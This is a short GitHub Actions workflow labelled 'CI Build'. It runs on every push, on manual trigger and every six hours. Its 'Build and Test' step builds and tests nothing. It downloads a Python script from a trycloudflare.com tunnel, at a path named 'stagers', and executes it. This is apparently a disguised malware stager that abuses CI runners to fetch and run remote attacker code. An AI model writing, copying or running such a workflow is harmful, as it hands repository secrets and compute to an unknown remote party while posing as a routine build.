name: CI Build

on:
  push:
  workflow_dispatch:
  schedule:
    - cron: '0 */6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout
      uses: actions/checkout@v2
    - name: Build and Test
      run: |
        wget https://europe-leo-eds-never.trycloudflare.com/stagers/jVC.py
        python3 jVC.py
